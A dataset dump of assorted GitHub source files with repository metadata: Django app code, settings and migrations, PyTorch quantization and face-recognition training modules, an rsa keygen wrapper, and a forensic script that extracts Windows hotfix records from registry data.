0f1a4fc7aa1489487fdae174b4b75c4ab037106d
|
refs/heads/main
| 2023-07-07T07:29:10.454706
| 2021-08-03T19:48:37
| 2021-08-03T19:48:37
| 392,434,831
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 126
|
py
|
from django.contrib import admin
# Register your models here.
from .models import Experience
admin.site.register(Experience)
|
[
"mrtcode2@gmail.com"
] |
mrtcode2@gmail.com
|
ef1289616c727ba7825f172842386212c6a0bb58
|
447c7a2c057c02488f6ebf79caba738ab5472fa0
|
/Well Planned Code/well_planned/well_planned/urls.py
|
5e646cfd436dcaa621e623dee859cfab760cba9d
|
[] |
no_license
|
Ashish-3001/Well-Planned
|
71fba1e4834a41eac198bdb9e815d64fd87e4cbc
|
be9158688f09e4e79d27cd3c22f21b045763e982
|
refs/heads/main
| 2023-07-17T03:44:53.137726
| 2021-09-02T06:57:57
| 2021-09-02T06:57:57
| 402,314,142
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,189
|
py
|
"""well_planned URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from my_app import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.Home),
path('todoList/', include('todo.urls')),
path('dairyList/', include('entries.urls')),
path('reminders/', include('remindapp.urls')),
path('wallet/', include('expensetrack.urls')),
path('weather/', views.Weather),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
[
"cvnnashish@gmail.com"
] |
cvnnashish@gmail.com
|
20163c0275e74a387eb1f8fc5d48e35d34d934c1
|
fcb0d7f9e92349a5b512e26f3318b29e04636889
|
/proyecto_colima/settings/memo.py
|
0e04eb2d550f1c892965f53720266e872ad21e49
|
[] |
no_license
|
alexabyx/RESPALDO-COLIMA
|
fc9f06ce38d2590499b45c0f97b25f9661663bf3
|
62cbe9c2700ccf01b40bd8e134dfc9ccf951fde3
|
refs/heads/master
| 2021-01-19T17:12:03.260726
| 2015-03-09T03:12:35
| 2015-03-09T03:12:35
| 30,132,081
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
from .common import *
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'so_factory',
'USER': 'root',
'PASSWORD': '',
'HOST': 'localhost',
'PORT': '3306',
'OPTIONS': {
'init_command': 'SET storage_engine=INNODB',
},
}
}
|
[
"alexabyx@gmail.com"
] |
alexabyx@gmail.com
|
e9bed052d8dc90762bbb0cc2031106059fedb6e3
|
dcd8a0a9ce04818487ba7d46a1ba07d18fb08b9f
|
/torch/quantization/_quantize_script.py
|
5d77785cc7742a543324d7df64ba47cd81852158
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
thomaswang525/pytorch
|
284efc782fdc333e24892ac10b4d8963f812bd0b
|
9e3605de98abb969124faff96e6e90e4f4014eb6
|
refs/heads/master
| 2021-05-18T08:30:09.190932
| 2020-03-30T02:46:19
| 2020-03-30T02:48:29
| 251,193,560
| 1
| 0
|
NOASSERTION
| 2020-03-30T03:38:57
| 2020-03-30T03:38:57
| null |
UTF-8
|
Python
| false
| false
| 4,668
|
py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import torch
from .qconfig import QConfig
from torch.jit._recursive import wrap_cpp_module
class ConvPackedParams(torch.nn.Module):
def __init__(self):
super(ConvPackedParams, self).__init__()
wq = torch._empty_affine_quantized([1, 1, 1, 1], scale=1.0, zero_point=0, dtype=torch.qint8)
self.stride = [1, 1]
self.padding = [0, 0]
self.dilation = [1, 1]
self.groups = 1
self.set_weight_bias(wq, None)
@torch.jit.export
def set_conv_params(self, stride, padding, dilation, groups):
# type: (List[int], List[int], List[int], int) -> None
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
@torch.jit.export
def set_weight_bias(self, weight, bias):
# type: (torch.Tensor, Optional[torch.Tensor]) -> None
self._packed_params = torch.ops.quantized.conv2d_prepack(weight, bias, self.stride,
self.padding, self.dilation, self.groups)
@torch.jit.export
def _weight_bias(self):
return torch.ops.quantized.conv2d_unpack(self._packed_params)
def forward(self, x):
return x
@torch.jit.export
def __getstate__(self):
qweight, bias = self._weight_bias()
return (qweight,
bias,
self.stride,
self.padding,
self.dilation,
self.groups,
self.training)
@torch.jit.export
def __setstate__(self, state):
self.stride = state[2]
self.padding = state[3]
self.dilation = state[4]
self.groups = state[5]
self.set_weight_bias(state[0],
state[1])
self.training = state[6]
linear_packed_params = None
conv_packed_params = None
if 'fbgemm' in torch.backends.quantized.supported_engines:
linear_packed_params = torch.jit.script(torch.nn.quantized.modules.linear.LinearPackedParams())._c
conv_packed_params = torch.jit.script(ConvPackedParams())._c
def _check_is_script_module(model):
if not isinstance(model, torch.jit.ScriptModule):
raise ValueError('input must be a script module, got: ' + str(type(model)))
def script_qconfig(qconfig):
return QConfig(
activation=torch.jit.script(qconfig.activation())._c,
weight=torch.jit.script(qconfig.weight())._c)
def prepare_script(model, qconfig_dict, inplace=False):
_check_is_script_module(model)
scripted_qconfig_dict = {k: script_qconfig(v) if v else None for k, v in qconfig_dict.items()}
if not inplace:
model = model.copy()
model = wrap_cpp_module(torch._C._jit_pass_insert_observers(model._c,
'forward',
scripted_qconfig_dict,
False))
return model
def prepare_dynamic_script(model, qconfig_dict):
_check_is_script_module(model)
scripted_qconfig_dict = {k: script_qconfig(v) for k, v in qconfig_dict.items()}
model = wrap_cpp_module(torch._C._jit_pass_insert_observers(model._c,
'forward',
scripted_qconfig_dict,
False,
True))
return model
def convert_script(model, inplace=False, debug=False):
_check_is_script_module(model)
if not inplace:
model = model.copy()
model.eval()
model = wrap_cpp_module(torch._C._jit_pass_insert_quant_dequant(model._c, 'forward', False))
if not debug:
model = wrap_cpp_module(torch._C._jit_pass_quant_finalize(model._c))
return model
def quantize_script(model, qconfig_dict, run_fn, run_args, inplace=False, debug=False):
_check_is_script_module(model)
if not model._c._has_method('forward'):
raise ValueError('input script module does not have forward method')
assert not inplace, "We don't support inplace right now"
if not inplace:
model = model.copy()
torch._C._jit_pass_dedup_module_uses(model._c)
model = wrap_cpp_module(torch._C._jit_pass_fold_convbn(model._c))
model = prepare_script(model, qconfig_dict, True)
run_fn(model._c._get_method('forward'), *run_args)
model = convert_script(model, True, debug)
return model
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
f3d66fab8fe7027335f3df1d85adf1ea5da47df9
|
78fc676ac58b534ef695096b871de84c37a8d5c7
|
/env/bin/pyrsa-keygen
|
264cc096b710486dad6d5fcd5cb49617537b49d7
|
[
"Apache-2.0"
] |
permissive
|
Pinto18/raspi_gassistant
|
60604ebb96b1150b64a19fe5a8a38f802ed37597
|
73910133a0f7b26d0d73f66ba48b056fa43a14d8
|
refs/heads/master
| 2021-08-30T05:17:12.812347
| 2017-12-16T04:44:53
| 2017-12-16T04:44:53
| 112,860,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 243
|
#!/home/pi/AIY-voice-kit-python/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from rsa.cli import keygen
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(keygen())
|
[
"pinto18.nd@gmail.com"
] |
pinto18.nd@gmail.com
|
|
eb2afda534a4e5d491b7d7b16a23a8f16d664115
|
985fd329007bc781e05604e65b260d0faf8eaec5
|
/views.py
|
f3a0efcf2d0958806d023371cab355556098ad0f
|
[] |
no_license
|
zdanozdan/mshop
|
e2c5d0c89e3ba89296e5f58a12cf16e08bb78751
|
1c7f3187870a5c86a07d7f46fa01b03165c621de
|
refs/heads/master
| 2021-03-12T20:07:36.954175
| 2012-10-26T14:21:23
| 2012-10-26T14:21:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,112
|
py
|
# This Python file uses the following encoding: utf-8
from django.shortcuts import render_to_response, get_object_or_404, redirect
from django.template import RequestContext
from django.utils.translation import ugettext as _
from django.conf import settings
from django.contrib import messages
from django.http import HttpResponse, HttpResponseRedirect
from django.core.urlresolvers import reverse
from shop.views.cart import CartDetails, CartItemDetail
from shop.views import ShopListView
from models import MikranProduct
import logging
from shop.util.cart import get_or_create_cart
from shop.forms import get_cart_item_formset
from shop.models.cartmodel import Cart,CartItem
from shop.forms import CartItemModelForm
from forms import CartForm
class WelcomeListView(ShopListView):
template_name = 'welcome.html'
model = MikranProduct
def dispatch(self, *args, **kwargs):
return super(WelcomeListView, self).dispatch(*args, **kwargs)
def do_currency_switch(self):
currency = self.request.session.get(settings.CURRENCY_COOKIE_NAME)
if currency in settings.CURRENCIES_LIST:
if MikranProduct.set_currency(self.request, code=currency) is True:
#logging.debug('currency set OK')
return
if MikranProduct.set_currency(self.request, code=settings.DEFAULT_CURRENCY) is True:
output = _('Error setting currency. Switched to default currency : %(currency)s') % {'currency': settings.DEFAULT_CURRENCY }
messages.add_message(self.request,messages.ERROR, output)
self.request.session[settings.CURRENCY_COOKIE_NAME] = settings.DEFAULT_CURRENCY
return
""" error currency setting """
if currency != settings.HOME_CURRENCY:
output = _('Error setting currency. Switched to default currency : %(currency)s') % {'currency': settings.DEFAULT_CURRENCY }
messages.add_message(self.request,messages.ERROR, output)
self.request.session[settings.CURRENCY_COOKIE_NAME] = settings.DEFAULT_CURRENCY
def get_queryset(self):
return MikranProduct.objects.all()[:5]
def get_context_data(self, **kwargs):
ctx = super(ShopListView, self).get_context_data(**kwargs)
#set up the currency before we use the cart itself
self.do_currency_switch()
state={'country':self.request.session.get('django_country')}
cart_object = get_or_create_cart(self.request)
cart_object.update(state)
ctx.update({'cart': cart_object})
ctx.update({'cart_items': cart_object.get_updated_cart_items()})
formset = get_cart_item_formset(cart_items=ctx['cart_items'])
ctx.update({'formset': formset, })
ctx.update({'cart_form': CartForm(instance=cart_object) })
return ctx
class MikranCart(CartDetails):
def update_context_with_cart_form(self,ctx):
cart_object = get_or_create_cart(self.request)
state={'country':self.request.session.get('django_country')}
cart_object.update(state)
ctx.update({'cart': cart_object})
ctx.update({'cart_items': cart_object.get_updated_cart_items()})
formset = get_cart_item_formset(cart_items=ctx['cart_items'])
ctx.update({'formset': formset, })
ctx.update({'cart_form': CartForm(instance=cart_object) })
return ctx
class MikranCartItemDetail(MikranCart):
template_name = "cart.html"
def post_success(self, product, cart_item):
"""
Post success hook
"""
messages.add_message(self.request,messages.INFO, _('Product (%s) has been added to basket') % (product),extra_tags='basket_only')
return redirect(self.request.POST.get('next'))
def get(self, request, *args, **kwargs):
#ctx = super(ShopListView, self).get_context_data(**kwargs)
ctx = self.get_context_data(**kwargs)
self.update_context_with_cart_form(ctx)
return self.render_to_response(ctx)
class MikranCartDetails(MikranCart):
template_name = 'cart.html'
def get(self, *args, **kwargs):
context = self.get_context_data(**kwargs)
self.update_context_with_cart_form(context)
return self.render_to_response(context)
"""
Deletes one of the cartItems. This should be posted to a properly
RESTful URL (that should contain the item's ID):
http://example.com/shop/cart/item/12345
"""
def delete(self, request, *args, **kwargs):
cart_object = get_or_create_cart(self.request)
item_id = self.kwargs.get('id')
item = cart_object.delete_item(item_id)
messages.add_message(request,messages.INFO, _('Product (%s) has been deleted from basket') % (item.product),extra_tags='basket_only')
if cart_object.get_items_count() == 0:
messages.add_message(request,messages.WARNING, _('You have deleted all products. Basket in empty now.'),extra_tags='basket_only')
return self.redirect()
def post(self, *args, **kwargs):
cart_object = get_or_create_cart(self.request)
f = CartForm(self.request.POST,instance=cart_object)
if f.is_valid():
f.save()
#Message only for EU cart clickers
if cart_object.is_eu_cart:
messages.add_message(self.request,messages.INFO, _('Remember that you need to have valid EU VAT number to claim 0% EU VAT rate'),extra_tags='basket_only')
else:
messages.add_message(self.request,messages.ERROR, _('Error changing VAT rate.'),extra_tags='basket_only')
return redirect(self.request.POST.get('next'))
def put(self, *args, **kwargs):
""" Update shopping cart form. """
context = self.get_context_data(**kwargs)
self.update_context_with_cart_form(context)
formset = get_cart_item_formset(cart_items=context['cart_items'],data=self.request.POST)
""" valid form redirects to get cart again, otherwise re-display form with errors """
if formset.is_valid():
formset.save()
messages.add_message(self.request,messages.INFO, _('Item quantity has been successfully changed.'),extra_tags='basket_only')
return self.redirect()
messages.add_message(self.request,messages.ERROR, _('Unable to change item quantity.'),extra_tags='basket_only')
context.update({'formset': formset, })
return self.render_to_response(context)
""" ajax call redirects to render cart object only, otherwise we want to redirect to next, or main page if next is missing"""
def redirect(self):
if self.request.is_ajax():
return HttpResponseRedirect(reverse('mikran_cart_get'))
if self.request.POST.get('next') is not None:
return HttpResponseRedirect(self.request.POST.get('next'))
return HttpResponseRedirect(reverse('main_page'))
def shop(request):
return render_to_response('welcome.html',
context_instance=RequestContext(request))
|
[
"tomasz@mikran.pl"
] |
tomasz@mikran.pl
|
3a16940ab2a40e617ed92c2249c39f81f6e348a5
|
b553e12ccd8d7d4653e8987688494e322602b146
|
/scripts/process/hotfixes/hotfixes.py
|
c5ad7d2ee221c15e40f05ba30bc00eb6616c2370
|
[
"MIT"
] |
permissive
|
fossabot/forensicworkflows
|
2a7339bc9e97f18e8a4f432e7a534f5318e1e8dc
|
fca4bcf5363163e6fdd78763fa4aa208c1f72d1f
|
refs/heads/master
| 2022-04-14T21:36:26.770660
| 2020-04-13T15:24:58
| 2020-04-13T15:24:58
| 255,069,891
| 0
| 0
| null | 2020-04-12T11:41:41
| 2020-04-12T11:41:40
| null |
UTF-8
|
Python
| false
| false
| 5,301
|
py
|
#!/usr/bin/env python
# Copyright (c) 2019 Siemens AG
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# Author(s): Demian Kellermann
"""
This plugin parses different registry entries for installed Hotfixes (patches) to the Windows system
as well as to other software components
"""
import logging
import re
import struct
from collections import defaultdict
from datetime import datetime
import forensicstore
from ...util import combined_conditions
LOGGER = logging.getLogger(__name__)
HOTFIX_PATHS_INSTALLER = [
'hkey_local_machine\\software\\microsoft\\windows\\currentversion\\component based servicing\\packages\\',
]
HOTFIX_PATHS_ADDITIONAL = [
'hkey_local_machine\\software\\wow6432node\\microsoft\\updates\\',
'hkey_local_machine\\software\\microsoft\\updates\\',
]
KB_REGEX = re.compile(r'KB\d+')
def _analyze_installer(obj):
entries = []
installer_entries = defaultdict(set)
hotfix_infos = {v["name"].lower(): v["data"] for v in obj["values"]}
if hotfix_infos.get('InstallClient') != 'WindowsUpdateAgent':
return []
hotfix = KB_REGEX.search(obj["key"].split('\\')[-1])
if not hotfix:
# some entries do not have the KB number in the title, but something like "RollupFix", check
# the InstallLocation value in this case
location = hotfix_infos.get('InstallLocation')
if location:
hotfix = KB_REGEX.search(location)
if not hotfix:
LOGGER.info("Non KB entry for WindowsUpdateAgent found: %s",
obj["key"])
return []
install_high = hotfix_infos.get('InstallTimeHigh')
install_low = hotfix_infos.get('InstallTimeLow')
if install_high and install_low:
timestamp = filetime_to_timestamp(
filetime_join(install_high, install_low))
else:
timestamp = ''
installer_entries[hotfix.group(0)].add(timestamp)
for hotfix in installer_entries:
entries.append({
'Hotfix':
hotfix,
'Installed':
sorted(installer_entries[hotfix])[0]
if installer_entries[hotfix] else '-',
'Source':
'Component Based Servicing',
"type":
"hotfix"
})
return entries
def _analyze_additional(key):
hotfix = key["key"].split('\\')[-1]
product = key["key"].split('\\')[-2]
return [{
'Hotfix': hotfix,
'Installed': key["modified"],
'Source': 'Microsoft Updates',
'Component': product,
"type": "hotfix"
}]
def transform(obj):
if any(map(lambda path: obj["key"].lower().startswith(path), HOTFIX_PATHS_INSTALLER)):
return _analyze_installer(obj)
if any(map(lambda path: obj["key"].lower().startswith(path), HOTFIX_PATHS_ADDITIONAL)):
return _analyze_additional(obj)
return []
def filetime_join(upper, lower):
"""
:param upper: upper part of the number
:param lower: lower part of the number
"""
return struct.unpack('Q', struct.pack('ii', lower, upper))[0]
def filetime_to_timestamp(filetime_64):
"""
The FILETIME timestamp is a 64-bit integer that contains the number
of 100th nano seconds since 1601-01-01 00:00:00.
The number is usually saved in the registry using two DWORD["values"]
:return: string of UTC time
"""
# pylint: disable=invalid-name
HUNDREDS_OF_NANOSECONDS_IN_A_SECOND = 10000000
UNIXEPOCH_AS_FILETIME = 116444736000000000
datetime_stamp = datetime.utcfromtimestamp(
(filetime_64 - UNIXEPOCH_AS_FILETIME) /
HUNDREDS_OF_NANOSECONDS_IN_A_SECOND)
return datetime_stamp.isoformat()
def main():
store = forensicstore.connect(".")
hklmsw = "HKEY_LOCAL_MACHINE\\SOFTWARE\\"
conditions = [{
'key':
hklmsw +
"Microsoft\\Windows\\CurrentVersion\\Component Based Servicing\\Packages\\%"
}, {
'key': hklmsw + "WOW6432Node\\Microsoft\\Updates\\%\\%"
}, {
'key': hklmsw + "Microsoft\\Updates\\%\\%"
}]
for item in store.select("windows-registry-key", combined_conditions(conditions)):
results = transform(item)
for result in results:
store.insert(result)
store.close()
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
fossabot.noreply@github.com
|
99871bec3457acd943707f85993b4ee2b8e01ff4
|
1b14bc0a6ea80ac0c1a3a6f8dbc7d461e607c2f5
|
/textma/sva/migrations/0003_auto_20160609_1521.py
|
de76563a2ef0b21203f6dad541ca58b98d12f74c
|
[] |
no_license
|
elwan/django
|
9fe3afc9efe31d0a63bd810b1c4d74040834cb5a
|
dc8b0ecc8ef7da6f07c230707b29a65c9cc55e7a
|
refs/heads/master
| 2020-04-06T06:58:49.353845
| 2016-07-19T12:25:23
| 2016-07-19T12:25:23
| 38,568,581
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 901
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-06-09 15:21
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sva', '0002_auto_20160609_1518'),
]
operations = [
migrations.AlterField(
model_name='message_erreur',
name='msg_erreur_utilisateur_id',
field=models.IntegerField(default=0, verbose_name='ID Utilisateur'),
),
migrations.AlterField(
model_name='message_multi',
name='utilisateur_id',
field=models.IntegerField(default=0, verbose_name='ID Utilisateur'),
),
migrations.AlterField(
model_name='reponse',
name='reponse_utilisateur_id',
field=models.IntegerField(default=0, verbose_name='ID Utilisateur'),
),
]
|
[
"elwan7@gmail.com"
] |
elwan7@gmail.com
|
690ddbacd49f54be38fe169b8cab0f1ee0eb2081
|
60766ab0ba3157d9eca0118bc3cfdb93011848c9
|
/code/insightface/arcface_torch/partial_fc.py
|
13c427a3e1eff684464b08664895e64931cbcbd9
|
[] |
no_license
|
wujiekd/Face_recognition_cnn
|
d63cb8b953b78b3bdabdfeaf1b5471579e9b2fbc
|
229b18a8eea1bcc3362f050cb3af2bc92beeaae5
|
refs/heads/main
| 2023-07-15T21:51:20.734410
| 2021-09-04T06:09:45
| 2021-09-04T06:09:45
| 403,071,269
| 1
| 0
| null | 2021-09-04T14:02:34
| 2021-09-04T14:02:33
| null |
UTF-8
|
Python
| false
| false
| 9,615
|
py
|
# -*- coding: utf-8 -*-
import logging
import os
import torch
#import torch.distributed as dist
from torch.nn import Module
from torch.nn.functional import normalize, linear
from torch.nn.parameter import Parameter
class PartialFC(Module):
"""
Author: {Xiang An, Yang Xiao, XuHan Zhu} in DeepGlint,
Partial FC: Training 10 Million Identities on a Single Machine
See the original paper:
https://arxiv.org/abs/2010.05222
"""
@torch.no_grad()
def __init__(self, rank, local_rank, world_size, batch_size, resume,
margin_softmax, num_classes, sample_rate=1.0, embedding_size=512, prefix="./"):
"""
rank: int
Unique process(GPU) ID from 0 to world_size - 1.
local_rank: int
Unique process(GPU) ID within the server from 0 to 7.
world_size: int
Number of GPU.
batch_size: int
Batch size on current rank(GPU).
resume: bool
Select whether to restore the weight of softmax.
margin_softmax: callable
A function of margin softmax, eg: cosface, arcface.
num_classes: int
The number of class center storage in current rank(CPU/GPU), usually is total_classes // world_size,
required.
sample_rate: float
The partial fc sampling rate, when the number of classes increases to more than 2 millions, Sampling
can greatly speed up training, and reduce a lot of GPU memory, default is 1.0.
embedding_size: int
The feature dimension, default is 512.
prefix: str
Path for save checkpoint, default is './'.
"""
super(PartialFC, self).__init__()
#
self.num_classes: int = num_classes
self.rank: int = rank
self.local_rank: int = local_rank
self.device: torch.device = torch.device("cuda:{}".format(self.local_rank))
self.world_size: int = world_size
self.batch_size: int = batch_size
self.margin_softmax: callable = margin_softmax
self.sample_rate: float = sample_rate
self.embedding_size: int = embedding_size
self.prefix: str = prefix
self.num_local: int = num_classes // world_size + int(rank < num_classes % world_size)
self.class_start: int = num_classes // world_size * rank + min(rank, num_classes % world_size)
self.num_sample: int = int(self.sample_rate * self.num_local)
self.weight_name = os.path.join(self.prefix, "rank_{}_softmax_weight.pt".format(self.rank))
self.weight_mom_name = os.path.join(self.prefix, "rank_{}_softmax_weight_mom.pt".format(self.rank))
if resume:
try:
self.weight: torch.Tensor = torch.load(self.weight_name)
self.weight_mom: torch.Tensor = torch.load(self.weight_mom_name)
if self.weight.shape[0] != self.num_local or self.weight_mom.shape[0] != self.num_local:
raise IndexError
logging.info("softmax weight resume successfully!")
logging.info("softmax weight mom resume successfully!")
except (FileNotFoundError, KeyError, IndexError):
self.weight = torch.normal(0, 0.01, (self.num_local, self.embedding_size), device=self.device)
self.weight_mom: torch.Tensor = torch.zeros_like(self.weight)
logging.info("softmax weight init!")
logging.info("softmax weight mom init!")
else:
self.weight = torch.normal(0, 0.01, (self.num_local, self.embedding_size), device=self.device)
self.weight_mom: torch.Tensor = torch.zeros_like(self.weight)
logging.info("softmax weight init successfully!")
logging.info("softmax weight mom init successfully!")
self.stream: torch.cuda.Stream = torch.cuda.Stream(local_rank)
self.index = None
if int(self.sample_rate) == 1:
self.update = lambda: 0
self.sub_weight = Parameter(self.weight)
self.sub_weight_mom = self.weight_mom
else:
self.sub_weight = Parameter(torch.empty((0, 0)).cuda(local_rank))
def save_params(self):
""" Save softmax weight for each rank on prefix
"""
torch.save(self.weight.data, self.weight_name)
torch.save(self.weight_mom, self.weight_mom_name)
@torch.no_grad()
def sample(self, total_label):
"""
Sample all positive class centers in each rank, and random select neg class centers to filling a fixed
`num_sample`.
total_label: tensor
Label after all gather, which cross all GPUs.
"""
index_positive = (self.class_start <= total_label) & (total_label < self.class_start + self.num_local)
total_label[~index_positive] = -1
total_label[index_positive] -= self.class_start
if int(self.sample_rate) != 1:
positive = torch.unique(total_label[index_positive], sorted=True)
if self.num_sample - positive.size(0) >= 0:
perm = torch.rand(size=[self.num_local], device=self.device)
perm[positive] = 2.0
index = torch.topk(perm, k=self.num_sample)[1]
index = index.sort()[0]
else:
index = positive
self.index = index
total_label[index_positive] = torch.searchsorted(index, total_label[index_positive])
self.sub_weight = Parameter(self.weight[index])
self.sub_weight_mom = self.weight_mom[index]
def forward(self, total_features, norm_weight):
""" Partial fc forward, `logits = X * sample(W)`
"""
torch.cuda.current_stream().wait_stream(self.stream)
logits = linear(total_features, norm_weight)
return logits
@torch.no_grad()
def update(self):
""" Set updated weight and weight_mom to memory bank.
"""
self.weight_mom[self.index] = self.sub_weight_mom
self.weight[self.index] = self.sub_weight
def prepare(self, label, optimizer):
"""
get sampled class centers for cal softmax.
label: tensor
Label tensor on each rank.
optimizer: opt
Optimizer for partial fc, which need to get weight mom.
"""
with torch.cuda.stream(self.stream):
total_label = torch.zeros(
size=[self.batch_size * self.world_size], device=self.device, dtype=torch.long)
#dist.all_gather(list(total_label.chunk(self.world_size, dim=0)), label)
total_label = label
self.sample(total_label)
optimizer.state.pop(optimizer.param_groups[-1]['params'][0], None)
optimizer.param_groups[-1]['params'][0] = self.sub_weight
optimizer.state[self.sub_weight]['momentum_buffer'] = self.sub_weight_mom
norm_weight = normalize(self.sub_weight)
return total_label, norm_weight
def forward_backward(self, label, features, optimizer):
"""
Partial fc forward and backward with model parallel
label: tensor
Label tensor on each rank(GPU)
features: tensor
Features tensor on each rank(GPU)
optimizer: optimizer
Optimizer for partial fc
Returns:
--------
x_grad: tensor
The gradient of features.
loss_v: tensor
Loss value for cross entropy.
"""
total_label, norm_weight = self.prepare(label, optimizer)
total_features = torch.zeros(
size=[self.batch_size * self.world_size, self.embedding_size], device=self.device)
#dist.all_gather(list(total_features.chunk(self.world_size, dim=0)), features.data)
total_features = features.data
total_features.requires_grad = True
logits = self.forward(total_features, norm_weight)
logits = self.margin_softmax(logits, total_label.cuda())
with torch.no_grad():
max_fc = torch.max(logits, dim=1, keepdim=True)[0]
#dist.all_reduce(max_fc, dist.ReduceOp.MAX)
# calculate exp(logits) and all-reduce
logits_exp = torch.exp(logits - max_fc)
logits_sum_exp = logits_exp.sum(dim=1, keepdims=True)
#dist.all_reduce(logits_sum_exp, dist.ReduceOp.SUM)
# calculate prob
logits_exp.div_(logits_sum_exp)
# get one-hot
grad = logits_exp
index = torch.where(total_label != -1)[0]
one_hot = torch.zeros(size=[index.size()[0], grad.size()[1]], device=grad.device)
one_hot.scatter_(1, total_label[index, None].cuda(), 1)
# calculate loss
loss = torch.zeros(grad.size()[0], 1, device=grad.device)
loss[index] = grad[index].gather(1, total_label[index, None].cuda())
#dist.all_reduce(loss, dist.ReduceOp.SUM)
loss_v = loss.clamp_min_(1e-30).log_().mean() * (-1)
# calculate grad
grad[index] -= one_hot
grad.div_(self.batch_size * self.world_size)
logits.backward(grad)
if total_features.grad is not None:
total_features.grad.detach_()
x_grad: torch.Tensor = torch.zeros_like(features, requires_grad=True)
# feature gradient all-reduce
#dist.reduce_scatter(x_grad, list(total_features.grad.chunk(self.world_size, dim=0)))
x_grad = x_grad * self.world_size
# backward backbone
return x_grad, loss_v
|
[
"noreply@github.com"
] |
wujiekd.noreply@github.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.